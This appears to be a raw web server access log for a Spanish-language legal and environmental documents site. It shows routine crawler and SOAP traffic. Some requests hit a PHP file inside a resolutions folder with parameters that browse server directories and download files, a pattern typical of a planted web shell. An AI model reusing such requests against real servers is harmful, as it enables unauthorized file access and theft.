201.245.192.253 - - [16/Jun/2024:11:38:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:38:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:11:38:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34583
66.249.66.19 - - [16/Jun/2024:11:39:20 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 200 1636862
201.245.192.253 - - [16/Jun/2024:11:39:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
89.58.55.156 - - [16/Jun/2024:11:39:26 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp HTTP/1.1" 200 6376
40.77.167.21 - - [16/Jun/2024:11:39:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00769.pdf HTTP/1.1" 200 925560
201.245.192.253 - - [16/Jun/2024:11:39:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34572
201.245.192.253 - - [16/Jun/2024:11:40:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:11:39:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
176.9.137.113 - - [16/Jun/2024:11:41:01 -0500] "GET /IsolucionSDA/Scripts/jquery.js HTTP/1.1" 200 299461
47.128.35.82 - - [16/Jun/2024:11:41:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1951-2000%5C&f=00001991.tif&white=1 HTTP/1.1" 200 37286
199.16.157.183 - - [16/Jun/2024:11:41:20 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
201.245.192.253 - - [16/Jun/2024:11:41:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:11:41:27 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:11:40:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:11:42:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:11:42:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [16/Jun/2024:11:43:22 -0500] "GET /Publicaciones/2024EE66743.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:11:43:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:43:27 -0500] "HEAD / HTTP/1.1" 200 -
144.76.111.167 - - [16/Jun/2024:11:43:39 -0500] "GET /IsolucionSDA/Scripts/customRequired/base64.js HTTP/1.1" 200 3069
201.245.192.253 - - [16/Jun/2024:11:44:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.21.136.254 - - [16/Jun/2024:11:44:53 -0500] "GET /IsolucionSDA/Arriba.asp HTTP/1.1" 200 7099
176.9.137.113 - - [16/Jun/2024:11:45:08 -0500] "GET /IsolucionSDA/Scripts/customRequired/toasterConfiguration.js HTTP/1.1" 200 1446
47.128.120.70 - - [16/Jun/2024:11:45:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2635.pdf&ft=notepad&white=1 HTTP/1.1" 200 364233
201.245.192.253 - - [16/Jun/2024:11:45:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [16/Jun/2024:11:45:43 -0500] "GET /BLA/resoluciones/AUTOS%202023/4733.pdf HTTP/1.1" 200 403557
201.245.192.253 - - [16/Jun/2024:11:46:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.52 - - [16/Jun/2024:11:46:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2842.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:11:45:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:11:47:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:11:47:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:11:46:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [16/Jun/2024:11:48:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:11:48:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:11:49:10 -0500] "GET /BLA/resoluciones/AUTOS%202016/0074.pdf HTTP/1.1" 200 521430
216.244.66.195 - - [16/Jun/2024:11:49:15 -0500] "GET /BLA/resoluciones/AUTOS%202016/0272.pdf HTTP/1.1" 200 522929
216.244.66.195 - - [16/Jun/2024:11:49:20 -0500] "GET /BLA/resoluciones/AUTOS%202016/0992.pdf HTTP/1.1" 200 1234054
201.245.192.253 - - [16/Jun/2024:11:49:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.120.98 - - [16/Jun/2024:11:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=editor-expand.min.js&ft=download HTTP/1.1" 200 13882
216.244.66.195 - - [16/Jun/2024:11:49:26 -0500] "GET /BLA/resoluciones/AUTOS%202016/1489.pdf HTTP/1.1" 200 297162
216.244.66.195 - - [16/Jun/2024:11:49:36 -0500] "GET /BLA/resoluciones/AUTOS%202016/1646.pdf HTTP/1.1" 200 296344
216.244.66.195 - - [16/Jun/2024:11:49:44 -0500] "GET /BLA/resoluciones/AUTOS%202016/1664.pdf HTTP/1.1" 200 274120
216.244.66.195 - - [16/Jun/2024:11:49:50 -0500] "GET /BLA/resoluciones/AUTOS%202016/1727.pdf HTTP/1.1" 200 468110
216.244.66.195 - - [16/Jun/2024:11:49:55 -0500] "GET /BLA/resoluciones/AUTOS%202016/1745.pdf HTTP/1.1" 200 522983
216.244.66.195 - - [16/Jun/2024:11:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202016/1801.pdf HTTP/1.1" 200 570063
52.167.144.215 - - [16/Jun/2024:11:50:02 -0500] "GET /Publicaciones/2024EE17633.pdf HTTP/1.1" 404 227
172.22.2.4 - - [16/Jun/2024:11:48:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62310
216.244.66.195 - - [16/Jun/2024:11:50:05 -0500] "GET /BLA/resoluciones/AUTOS%202016/1802.pdf HTTP/1.1" 200 606918
216.244.66.195 - - [16/Jun/2024:11:50:09 -0500] "GET /BLA/resoluciones/AUTOS%202016/1841.pdf HTTP/1.1" 200 474303
216.244.66.195 - - [16/Jun/2024:11:50:12 -0500] "GET /BLA/resoluciones/AUTOS%202016/2081.pdf HTTP/1.1" 200 660193
216.244.66.195 - - [16/Jun/2024:11:50:15 -0500] "GET /BLA/resoluciones/AUTOS%202016/2491.pdf HTTP/1.1" 200 536362
216.244.66.195 - - [16/Jun/2024:11:50:18 -0500] "GET /BLA/resoluciones/AUTOS%202016/2612.pdf HTTP/1.1" 200 477816
216.244.66.195 - - [16/Jun/2024:11:50:22 -0500] "GET /BLA/resoluciones/AUTOS%202016/2790.pdf HTTP/1.1" 200 400169
201.245.192.253 - - [16/Jun/2024:11:50:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:11:50:25 -0500] "GET /BLA/resoluciones/AUTOS%202016/3121.pdf HTTP/1.1" 200 441241
78.46.69.214 - - [16/Jun/2024:11:50:47 -0500] "GET /IsolucionSDA/bancoconocimiento/R/RegistrodeinformacionsobrelaconformacionoactualizacionDepartamentodeGestionAmbiental_v1/RegistrodeinformacionsobrelaconformacionoactualizacionDepartamentodeGestionAmbiental_v1.asp HTTP/1.1" 404 5236
201.245.192.253 - - [16/Jun/2024:11:51:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:11:52:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
